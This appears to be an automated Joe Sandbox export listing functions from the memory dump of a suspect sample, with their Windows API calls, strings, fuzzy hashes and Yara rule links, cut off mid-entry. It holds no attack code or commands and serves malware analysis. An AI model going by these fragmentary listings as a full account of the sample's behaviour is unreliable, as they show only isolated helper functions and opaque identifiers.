Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 9659439c9c5a25426ff95f1cb9aeb970a3ce469610b80dd2e47f16189d448189
Instruction ID: 77717c985c6c77e9ba3a09a97197a07520a521fbe89205128b83219d364694ac
Opcode Fuzzy Hash: 9659439c9c5a25426ff95f1cb9aeb970a3ce469610b80dd2e47f16189d448189
Instruction Fuzzy Hash: 0A515871408748ABD320EF50DC86BAFBBE8FF95344F81885DF2D9410A1DB308669CB66

Function 001E9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00184F0B: __fread_nolock.LIBCMT ref: 00184F29

_wcscmp.LIBCMT ref: 001E9824
_wcscmp.LIBCMT ref: 001E9837

Strings

FILE, xrefs: 001E9770

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 6c69ad1c1f428898c65946d43955e5a0e76b1373d5463b003d6657153f45d672
Instruction ID: 7c5165b7d5b23b24221356c9e60a3fb3596877fb03c2db00c92030f3203908d0
Opcode Fuzzy Hash: 6c69ad1c1f428898c65946d43955e5a0e76b1373d5463b003d6657153f45d672
Instruction Fuzzy Hash: 4F41B571A0064ABBDF20ABA5CC45FEFBBBDDF96710F000469F904AB191DB719A048B61

Function 001C0574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001C057F

Strings

Dd$, xrefs: 0018A317
Dd$, xrefs: 0018A151

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClearVariant
String ID: Dd$$Dd$
API String ID: 1473721057-4015857051
Opcode ID: 839af2664445214af0b20c4bfeb00a9e1d7ebca557913a09f7fab2f18e03c3e7
Instruction ID: cd74d7ef12fca922257cf4aa9fa886c9782bd02a0cb74bc0675ed1fe17175fbe
Opcode Fuzzy Hash: 839af2664445214af0b20c4bfeb00a9e1d7ebca557913a09f7fab2f18e03c3e7
Instruction Fuzzy Hash: B951E3786043419FEB64DF18C588A1ABBF1BF9A754F94485DF9858B321D331E981CF42

Function 001F258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001F259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001F25D4

Strings

|, xrefs: 001F25A5

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: a2b03d58c0e190f6b79a3c2c52c1502bff10074c41e08ff30ec89ed8e5e129a5
Instruction ID: 3d84522b2d309578812753e58e841ea188a5b3a49e1a1cc0c2723da3448aa2fe
Opcode Fuzzy Hash: a2b03d58c0e190f6b79a3c2c52c1502bff10074c41e08ff30ec89ed8e5e129a5
Instruction Fuzzy Hash: 7231F371804119ABCF11EFA4CC89EEEBBB9FF18310F100069E915A6162EB319A56DB60

Function 00207A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00207B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00207B76

Strings

', xrefs: 00207ACA

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 06d139b16011e962158e7ab72bbe6585ac88eaa37b286c5938a33df767a20aab
Instruction ID: 695743c1408d1c90b099bcd86901bbc384e1725f7eb752760af42e1d7088d65d
Opcode Fuzzy Hash: 06d139b16011e962158e7ab72bbe6585ac88eaa37b286c5938a33df767a20aab
Instruction Fuzzy Hash: 7C410874E1530A9FDB14CF64D981BDABBB5FB09304F10416AE905AB392D770A961CFA0

Function 00206A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00206B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00206B53

Strings

static, xrefs: 00206AB3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 3d9213aa215aca5d8dc6cc678e4fca5717e1ee9c9c117e1fbb096afa999416e5
Instruction ID: 7b3c693aa4c0380642abf0e2b01f2ce56e846b3f42fbfdad8fd8fd6c74035285
Opcode Fuzzy Hash: 3d9213aa215aca5d8dc6cc678e4fca5717e1ee9c9c117e1fbb096afa999416e5
Instruction Fuzzy Hash: D631AF71220705AEDB109F64CC84BFB77A9FF48764F108619F9A5D7191DB31ACA1CB60

Function 001E28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001E2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001E294C

Strings

0, xrefs: 001E290A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d40e50441db69914ea01ceb9df08af8951c0560139625a13f2a7464a0f040a3b
Instruction ID: b7fa6fe87f7dfb843ddd76a671d59ca9ca31544f5b50325942cf8df753420662
Opcode Fuzzy Hash: d40e50441db69914ea01ceb9df08af8951c0560139625a13f2a7464a0f040a3b
Instruction Fuzzy Hash: CE312871600795DFEF28CF5ACC45BAEBBFCEF45358F181029E885A61A2DB709940CB11

Function 002066D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00206761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0020676C

Strings

Combobox, xrefs: 0020672E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a748db52784046105fcfca887dc99823222ee36af8a3a47ae9979397dfc07645
Instruction ID: a2d76fdf8277c3315a942eca143d3c523ea29091dd4904a4112b1aab2a74d2ba
Opcode Fuzzy Hash: a748db52784046105fcfca887dc99823222ee36af8a3a47ae9979397dfc07645
Instruction Fuzzy Hash: BF11B675220309AFEF219F54DC88EBB776EEB45368F100225F914972E2D675DC7187A0

Function 00206C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91

GetWindowRect.USER32(00000000,?), ref: 00206C71
GetSysColor.USER32(00000012), ref: 00206C8B

Strings

static, xrefs: 00206C4E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9d80a6d46521dbf63d2aaabf39b90aff4f909b3536f3860d09fddec92e657b37
Instruction ID: 1e2dff1ea524be2f8af788f71005cfd4f4a7dc07e1b890200257f90942cfbd9e
Opcode Fuzzy Hash: 9d80a6d46521dbf63d2aaabf39b90aff4f909b3536f3860d09fddec92e657b37
Instruction Fuzzy Hash: 9A21297252020AAFDF14DFA8DD49AFA7BA8FB08314F004629FD95D2291D735E861DB60

Function 00206920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002069A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002069B1

Strings

edit, xrefs: 00206986

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 0d113388ae385c286bd44de9ecf3f8dc16dc638cea9be6d5150888fe04f88587
Instruction ID: d9d2c2ba17b1453abf2f3059f518925b9f93dcd102a8eb0755b4e817321b6d8f
Opcode Fuzzy Hash: 0d113388ae385c286bd44de9ecf3f8dc16dc638cea9be6d5150888fe04f88587
Instruction Fuzzy Hash: D5118F71120309ABEB208F64DC48EEB3B69EB05374F504724F9A5979E2C771DC719B60

Function 001E29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001E2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001E2A41

Strings

0, xrefs: 001E2A18

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2467609ea2db65a009c7776632c2a657feaf814d5fedf758265f9aed386d7738
Instruction ID: db0ac97fb115c51cb29761a4e4c12240fd3e0207cab7f4695ff4238a4d4d9827
Opcode Fuzzy Hash: 2467609ea2db65a009c7776632c2a657feaf814d5fedf758265f9aed386d7738
Instruction Fuzzy Hash: 16113432900AA4ABCF34DB99DC58FAE73BCAB86304F054031E855E7291D770AD0AC791

Function 001F21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001F222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001F2255

Strings

<local>, xrefs: 001F221D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: bcb0c6a36e86705113df8189be0126b045dad53143717e8b2db61d7b250141be
Instruction ID: f1eca4181fc59540cfe01b0c2e254f36f3c5c4b55151164e0e49a4f720324978
Opcode Fuzzy Hash: bcb0c6a36e86705113df8189be0126b045dad53143717e8b2db61d7b250141be
Instruction Fuzzy Hash: A8112170641229BAEB298F518C99EFBFBACFF16351F10822AFB0586440D3705891D6F1

Function 0019092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00183C14,002452F8,?,?,?), ref: 0019096E

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

_wcscat.LIBCMT ref: 001C4CB7

Strings

S$, xrefs: 001909AE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: S$
API String ID: 257928180-1235517146
Opcode ID: 685dc1f3f332bd99883a2a56f729791a960243d44f05e1f74e4622b2de4e6716
Instruction ID: ea3e6c094943f5034b89d542d0e0cda84bf3faaabf543f1ce3fbeb982dbb8ff2
Opcode Fuzzy Hash: 685dc1f3f332bd99883a2a56f729791a960243d44f05e1f74e4622b2de4e6716
Instruction Fuzzy Hash: 0411A131A05219ABCF55FBA4D906EDD77E8EF28354B1044A5F98CD3282EBB0EB844B10

Function 001D8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 001DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 001DAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001D8E73

Strings

ListBox, xrefs: 001D8E3D
ComboBox, xrefs: 001D8E12

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 0e75a30eb4131e6fbb513b26ce4a81bca81d8a5f747811743d49aba921f42791
Instruction ID: f52812483686f7b7220675543924110a4a1241abad7004afa7eb35dcfe2eb725
Opcode Fuzzy Hash: 0e75a30eb4131e6fbb513b26ce4a81bca81d8a5f747811743d49aba921f42791
Instruction Fuzzy Hash: 9801DEB5A01218ABCB14FBA0CC468FE7369EF12320B500A1AF821573E2DF319908DB50

Function 001D8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 001DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 001DAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 001D8D6B

Strings

ListBox, xrefs: 001D8D35
ComboBox, xrefs: 001D8D0A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 2ab6c1a2ceebfc0a56960936cc0dad66bd74a0edccd7cd3e0f00f1e23b909798
Instruction ID: 3ab4ed7113af91403c0d44f659f635f343a1cc528c54ed7f3c1786ab84001cc7
Opcode Fuzzy Hash: 2ab6c1a2ceebfc0a56960936cc0dad66bd74a0edccd7cd3e0f00f1e23b909798
Instruction Fuzzy Hash: 8201D4B5A41508ABCF24FBE0C956AFE73A9DF25300F50051AB802632D1DF219E08D771

Function 001D8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 001DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 001DAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 001D8DEE

Strings

ListBox, xrefs: 001D8DBA
ComboBox, xrefs: 001D8D8F

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 33d8e3c9baf1d3cc4b4740729a7122473861275fc5d5731043942012c4fbad20
Instruction ID: 1ce99aae7bd316a25f1f7bf11a482f4269a23601e87e98669c0cba090222dea7
Opcode Fuzzy Hash: 33d8e3c9baf1d3cc4b4740729a7122473861275fc5d5731043942012c4fbad20
Instruction Fuzzy Hash: EF01F2B6A41108A7CF25FAE4C942AFE73ADCF21300F500516B801633D2DF218E18E671

Function 001DC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001DC534

Part of subcall function 001DC816: _memmove.LIBCMT ref: 001DC860
Part of subcall function 001DC816: VariantInit.OLEAUT32(00000000), ref: 001DC882
Part of subcall function 001DC816: VariantCopy.OLEAUT32(00000000,?), ref: 001DC88C

VariantClear.OLEAUT32(?), ref: 001DC556

Strings

d}#, xrefs: 001DC517

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}#
API String ID: 2932060187-2288634919
Opcode ID: 6d48271efbbf3f066169e9f4b4a8902e231daaf9121ef54c4cb3d8e0e74bdd64
Instruction ID: 7393dbc84fc29c434f1f179e0196947894d4870ab85b3165a6bbed1e946c278b
Opcode Fuzzy Hash: 6d48271efbbf3f066169e9f4b4a8902e231daaf9121ef54c4cb3d8e0e74bdd64
Instruction Fuzzy Hash: 0A11FEB19007099FC720DF99D88489AF7F8FB18314B50866EE58A97611D771AA44CF90

Function 001E4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 001E4F46
_wcscmp.LIBCMT ref: 001E4F58

Strings

#32770, xrefs: 001E4F52

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: e8cef984f41642339eccdc85337ba482c4ac97626b5f4102d60f30d89b48acce
Instruction ID: 6a9c9dc94a1999d46800b99a5df605063fb87cecb527238320d7cc923f96442f
Opcode Fuzzy Hash: e8cef984f41642339eccdc85337ba482c4ac97626b5f4102d60f30d89b48acce
Instruction Fuzzy Hash: ABE0D836A003282BD7209BA9AC4DFA7F7ACEB56B71F010067FD04D7051EA60AB5587E1

Function 001BB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001BB314: _memset.LIBCMT ref: 001BB321

Part of subcall function 001A0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001BB2F0,?,?,?,0018100A), ref: 001A0945

IsDebuggerPresent.KERNEL32(?,?,?,0018100A), ref: 001BB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0018100A), ref: 001BB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001BB2FE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 661ed88658c564a6956b0ec2b58ad6496ab8ccf982621591571f06ac693c2649
Instruction ID: 3ffed1a5d318068ea81b019f99d76efdbaa99c84ca1f59eeb085d76b4f4165b5
Opcode Fuzzy Hash: 661ed88658c564a6956b0ec2b58ad6496ab8ccf982621591571f06ac693c2649
